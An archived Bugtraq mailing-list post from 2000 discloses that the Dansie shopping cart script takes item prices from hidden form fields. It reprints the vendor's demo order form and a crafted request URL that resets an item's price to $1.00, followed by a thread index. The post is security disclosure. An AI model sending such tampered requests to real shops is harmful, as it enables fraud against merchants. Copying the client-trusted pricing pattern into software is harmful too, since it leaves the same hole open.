Bugtraq mailing list archives

more problems with that POS dansie cart software!

From: juice () 3SHEEP COM (tombow)
Date: Fri, 14 Apr 2000 11:09:47 -0400


if installing a backdoor in the cart software wasn't bad enough.. the
whole implimentation of pricing and adding items to cart is crap..

example form to add items to your cart (kindly provided on the publishers
site using the demo cart they set up for us):

*snip*

<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl";>

Black Leather purse with leather straps<BR>
Price: $20.00<BR>

<INPUT TYPE=HIDDEN NAME=name     VALUE="Black leather purse">
<INPUT TYPE=HIDDEN NAME=price    VALUE="20.00">
<INPUT TYPE=HIDDEN NAME=sh       VALUE="1">  <!-- Shipping and Handling
-->
<INPUT TYPE=HIDDEN NAME=img      VALUE="purse.jpg">
<INPUT TYPE=HIDDEN NAME=return   VALUE="http://www.dansie.net/demo.html";>
<INPUT TYPE=HIDDEN NAME=custom1  VALUE="Black leather purse with leather straps">

<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>

*snip*

a couple of quick alterations and we can now add:

one piece of crap cart software..

http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables

I am aware this was posted a few months ago but I don't recall anyone
posting in relation to this particular software package..

tom

Current thread:

Performance Copilot for IRIX 6.5, (continued)
- Performance Copilot for IRIX 6.5 Marcelo Magnasco (Apr 12)
- Microsoft Security Bulletin (MS00-024) Microsoft Product Security (Apr 12)
- Re: Back Door in Commercial Shopping Cart Luciano Ramos (Apr 13)
  - [TL-Security-Announce] PAM and usermode TLSA2000009-1 Katie Moussouris (Apr 14)
  - Re: Back Door in Commercial Shopping Cart Luciano Ramos (Apr 14)
    - Re: Back Door in Commercial Shopping Cart [Stormer Hosting] Dan Kaminsky (Apr 14)
    - New DOS on Interscan NT/3.32 Alain Thivillon (Apr 17)
    - Re: Back Door in Commercial Shopping Cart [RESOLVED] Dan Kaminsky (Apr 17)
- Re: Back Door in Commercial Shopping Cart Pete Holsberg (Apr 13)
- Re: Back Door in Commercial Shopping Cart Anik (Apr 13)
- more problems with that POS dansie cart software! tombow (Apr 14)
  - Re: more problems with that POS dansie cart software! Randy Janinda (Apr 14)
  - nmh-1.0.4 released Dan Harkless (Apr 14)
  - xfs Michal Zalewski (Apr 16)
  - StarOffice 5.1 Michal Zalewski (Apr 16)
  - XFree86 server overflow Michal Zalewski (Apr 16)
    - XFree86 server overflow - exploit issues Michal Zalewski (Apr 16)
    - Reappearance of an old IE security bug Ben Mesander (Apr 16)
    - Re: Reappearance of an old IE security bug Vladimir Dubrovin (Apr 17)
    - Announcing: Solaris Fingerprint Database (sfpDB) on SunSolve Casper Dik (Apr 17)
    - Re: XFree86 server overflow Olaf Kirch (Apr 17)

(Thread continues...)